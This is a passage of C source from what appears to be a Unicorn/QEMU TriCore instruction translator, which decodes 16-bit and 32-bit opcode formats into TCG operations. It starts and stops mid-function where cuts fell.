default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sro_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r2; int32_t address; r2 = MASK_OP_SRO_S2(ctx->opcode); address = MASK_OP_SRO_OFF4(ctx->opcode); /* SRO-format */ switch (op1) { case OPC1_16_SRO_LD_A: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_LD_BU: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); 
break; case OPC1_16_SRO_LD_H: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); break; case OPC1_16_SRO_LD_W: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_ST_A: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_ST_B: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); break; case OPC1_16_SRO_ST_H: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 2, MO_LESW); break; case OPC1_16_SRO_ST_W: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sr_system(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; op2 = MASK_OP_SR_OP2(ctx->opcode); switch (op2) { case OPC2_16_SR_NOP: break; case OPC2_16_SR_RET: gen_compute_branch(ctx, op2, 0, 0, 0, 0); break; case OPC2_16_SR_RFE: gen_helper_rfe(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; break; case OPC2_16_SR_DEBUG: /* raise EXCP_DEBUG */ break; case OPC2_16_SR_FRET: gen_fret(ctx); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sr_accu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1; TCGv temp; r1 = MASK_OP_SR_S1D(ctx->opcode); op2 = MASK_OP_SR_OP2(ctx->opcode); switch (op2) { case OPC2_16_SR_RSUB: /* overflow only if r1 = -0x80000000 */ temp = tcg_const_i32(tcg_ctx, -0x80000000); /* calc V bit */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* sub */ tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); /* calc av */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_PSW_AV); /* calc sav */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); break; case OPC2_16_SR_SAT_B: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0x7f, -0x80); break; case OPC2_16_SR_SAT_BU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0xff); break; case OPC2_16_SR_SAT_H: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0x7fff, -0x8000); break; case OPC2_16_SR_SAT_HU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0xffff); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_16Bit_opc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int op1; int r1, r2; int32_t const16; int32_t address; TCGv temp; op1 = MASK_OP_MAJOR(ctx->opcode); /* handle ADDSC.A opcode only being 6 bit long */ if (unlikely((op1 & 0x3f) == OPC1_16_SRRS_ADDSC_A)) { op1 = OPC1_16_SRRS_ADDSC_A; } switch (op1) { case OPC1_16_SRC_ADD: case OPC1_16_SRC_ADD_A15: case OPC1_16_SRC_ADD_15A: case OPC1_16_SRC_ADD_A: case OPC1_16_SRC_CADD: case OPC1_16_SRC_CADDN: case OPC1_16_SRC_CMOV: case OPC1_16_SRC_CMOVN: case OPC1_16_SRC_EQ: case OPC1_16_SRC_LT: case OPC1_16_SRC_MOV: case OPC1_16_SRC_MOV_A: case OPC1_16_SRC_MOV_E: case OPC1_16_SRC_SH: case OPC1_16_SRC_SHA: decode_src_opc(ctx, 
op1); break; /* SRR-format */ case OPC1_16_SRR_ADD: case OPC1_16_SRR_ADD_A15: case OPC1_16_SRR_ADD_15A: case OPC1_16_SRR_ADD_A: case OPC1_16_SRR_ADDS: case OPC1_16_SRR_AND: case OPC1_16_SRR_CMOV: case OPC1_16_SRR_CMOVN: case OPC1_16_SRR_EQ: case OPC1_16_SRR_LT: case OPC1_16_SRR_MOV: case OPC1_16_SRR_MOV_A: case OPC1_16_SRR_MOV_AA: case OPC1_16_SRR_MOV_D: case OPC1_16_SRR_MUL: case OPC1_16_SRR_OR: case OPC1_16_SRR_SUB: case OPC1_16_SRR_SUB_A15B: case OPC1_16_SRR_SUB_15AB: case OPC1_16_SRR_SUBS: case OPC1_16_SRR_XOR: decode_srr_opc(ctx, op1); break; /* SSR-format */ case OPC1_16_SSR_ST_A: case OPC1_16_SSR_ST_A_POSTINC: case OPC1_16_SSR_ST_B: case OPC1_16_SSR_ST_B_POSTINC: case OPC1_16_SSR_ST_H: case OPC1_16_SSR_ST_H_POSTINC: case OPC1_16_SSR_ST_W: case OPC1_16_SSR_ST_W_POSTINC: decode_ssr_opc(ctx, op1); break; /* SRRS-format */ case OPC1_16_SRRS_ADDSC_A: r2 = MASK_OP_SRRS_S2(ctx->opcode); r1 = MASK_OP_SRRS_S1D(ctx->opcode); const16 = MASK_OP_SRRS_N(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], const16); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; /* SLRO-format */ case OPC1_16_SLRO_LD_A: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; case OPC1_16_SLRO_LD_BU: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16, MO_UB); break; case OPC1_16_SLRO_LD_H: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 2, MO_LESW); break; case OPC1_16_SLRO_LD_W: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; /* SB-format */ case OPC1_16_SB_CALL: case OPC1_16_SB_J: case OPC1_16_SB_JNZ: case OPC1_16_SB_JZ: address = MASK_OP_SB_DISP8_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, 0, address); break; /* SBC-format */ case OPC1_16_SBC_JEQ: case OPC1_16_SBC_JNE: address = MASK_OP_SBC_DISP4(ctx->opcode); const16 = MASK_OP_SBC_CONST4_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); break; case OPC1_16_SBC_JEQ2: case OPC1_16_SBC_JNE2: if (has_feature(ctx, TRICORE_FEATURE_16)) { address = MASK_OP_SBC_DISP4(ctx->opcode); const16 = MASK_OP_SBC_CONST4_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; /* SBRN-format */ case OPC1_16_SBRN_JNZ_T: case OPC1_16_SBRN_JZ_T: address = MASK_OP_SBRN_DISP4(ctx->opcode); const16 = MASK_OP_SBRN_N(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); break; /* SBR-format */ case OPC1_16_SBR_JEQ2: case OPC1_16_SBR_JNE2: if (has_feature(ctx, TRICORE_FEATURE_16)) { r1 = MASK_OP_SBR_S2(ctx->opcode); address = MASK_OP_SBR_DISP4(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, address); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_16_SBR_JEQ: case OPC1_16_SBR_JGEZ: case OPC1_16_SBR_JGTZ: case OPC1_16_SBR_JLEZ: case OPC1_16_SBR_JLTZ: case OPC1_16_SBR_JNE: case OPC1_16_SBR_JNZ: case OPC1_16_SBR_JNZ_A: case OPC1_16_SBR_JZ: case OPC1_16_SBR_JZ_A: case OPC1_16_SBR_LOOP: r1 = MASK_OP_SBR_S2(ctx->opcode); address = MASK_OP_SBR_DISP4(ctx->opcode); gen_compute_branch(ctx, 
op1, r1, 0, 0, address); break; /* SC-format */ case OPC1_16_SC_AND: case OPC1_16_SC_BISR: case OPC1_16_SC_LD_A: case OPC1_16_SC_LD_W: case OPC1_16_SC_MOV: case OPC1_16_SC_OR: case OPC1_16_SC_ST_A: case OPC1_16_SC_ST_W: case OPC1_16_SC_SUB_A: decode_sc_opc(ctx, op1); break; /* SLR-format */ case OPC1_16_SLR_LD_A: case OPC1_16_SLR_LD_A_POSTINC: case OPC1_16_SLR_LD_BU: case OPC1_16_SLR_LD_BU_POSTINC: case OPC1_16_SLR_LD_H: case OPC1_16_SLR_LD_H_POSTINC: case OPC1_16_SLR_LD_W: case OPC1_16_SLR_LD_W_POSTINC: decode_slr_opc(ctx, op1); break; /* SRO-format */ case OPC1_16_SRO_LD_A: case OPC1_16_SRO_LD_BU: case OPC1_16_SRO_LD_H: case OPC1_16_SRO_LD_W: case OPC1_16_SRO_ST_A: case OPC1_16_SRO_ST_B: case OPC1_16_SRO_ST_H: case OPC1_16_SRO_ST_W: decode_sro_opc(ctx, op1); break; /* SSRO-format */ case OPC1_16_SSRO_ST_A: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; case OPC1_16_SSRO_ST_B: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16, MO_UB); break; case OPC1_16_SSRO_ST_H: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 2, MO_LESW); break; case OPC1_16_SSRO_ST_W: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; /* SR-format */ case OPCM_16_SR_SYSTEM: decode_sr_system(ctx); break; case OPCM_16_SR_ACCU: decode_sr_accu(ctx); break; case OPC1_16_SR_JI: r1 = MASK_OP_SR_S1D(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, 0); break; case OPC1_16_SR_NOT: r1 = MASK_OP_SR_S1D(ctx->opcode); tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* * 32 bit instructions */ /* ABS-format */ static void decode_abs_ldw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LD_A: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LESL); break; case OPC2_32_ABS_LD_D: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_ABS_LD_DA: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); break; case OPC2_32_ABS_LD_W: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LD_B: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_SB); break; case OPC2_32_ABS_LD_BU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_UB); break; case OPC2_32_ABS_LD_H: tcg_gen_qemu_ld_tl(tcg_ctx, 
tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESW); break; case OPC2_32_ABS_LD_HU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldst_swap(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LDMST: gen_ldmst(ctx, r1, temp); break; case OPC2_32_ABS_SWAP_W: gen_swap(ctx, r1, temp); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldst_context(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int32_t off18; off18 = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); switch (op2) { case OPC2_32_ABS_LDLCX: gen_helper_1arg(tcg_ctx, ldlcx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_LDUCX: gen_helper_1arg(tcg_ctx, lducx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_STLCX: gen_helper_1arg(tcg_ctx, stlcx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_STUCX: gen_helper_1arg(tcg_ctx, stucx, EA_ABS_FORMAT(off18)); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_abs_store(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_ST_A: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LESL); break; case OPC2_32_ABS_ST_D: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_ABS_ST_DA: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); break; case OPC2_32_ABS_ST_W: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_storeb_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_ST_B: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_UB); break; case OPC2_32_ABS_ST_H: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } /* Bit-format */ static void decode_bit_andacc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); op2 = MASK_OP_BIT_OP2(ctx->opcode); switch (op2) { case OPC2_32_BIT_AND_AND_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl, &tcg_gen_and_tl); break; case OPC2_32_BIT_AND_ANDN_T: 
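        /*
         * Sketch of the two-callback scheme (my reading of gen_bit_2op,
         * defined earlier in this file; not quoted from the manual):
         *     bit  = op1(D[a] >> pos1, D[b] >> pos2);      inner combine
         *     D[c] = deposit(D[c], op2(D[c], bit), 0, 1);  fold into bit 0
         * so AND.ANDN.T below comes out as, roughly,
         *     D[c][0] = D[c][0] & (D[a][pos1] & ~D[b][pos2]);
         */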
gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl, &tcg_gen_and_tl); break; case OPC2_32_BIT_AND_NOR_T: if (TCG_TARGET_HAS_andc_i32) { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_andc_tl); } else { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl, &tcg_gen_and_tl); } break; case OPC2_32_BIT_AND_OR_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_and_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_logical_t(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); op2 = MASK_OP_BIT_OP2(ctx->opcode); switch (op2) { case OPC2_32_BIT_AND_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl); break; case OPC2_32_BIT_ANDN_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl); break; case OPC2_32_BIT_NOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl); break; case OPC2_32_BIT_OR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], pos2); if (op2 == OPC2_32_BIT_INSN_T) { tcg_gen_not_tl(tcg_ctx, temp, temp); } tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, pos1, 1); tcg_temp_free(tcg_ctx, temp); } static void decode_bit_logical_t2(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); switch (op2) { case OPC2_32_BIT_NAND_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nand_tl); break; case OPC2_32_BIT_ORN_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_orc_tl); break; case OPC2_32_BIT_XNOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_eqv_tl); break; case OPC2_32_BIT_XOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_orand(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int 
pos1, pos2; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); switch (op2) { case OPC2_32_BIT_OR_AND_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl, &tcg_gen_or_tl); break; case OPC2_32_BIT_OR_ANDN_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl, &tcg_gen_or_tl); break; case OPC2_32_BIT_OR_NOR_T: if (TCG_TARGET_HAS_orc_i32) { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_orc_tl); } else { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl, &tcg_gen_or_tl); } break; case OPC2_32_BIT_OR_OR_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_sh_logic1(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_BIT_SH_AND_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl); break; case OPC2_32_BIT_SH_ANDN_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl); break; case OPC2_32_BIT_SH_NOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl); break; case OPC2_32_BIT_SH_OR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } static void decode_bit_sh_logic2(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case 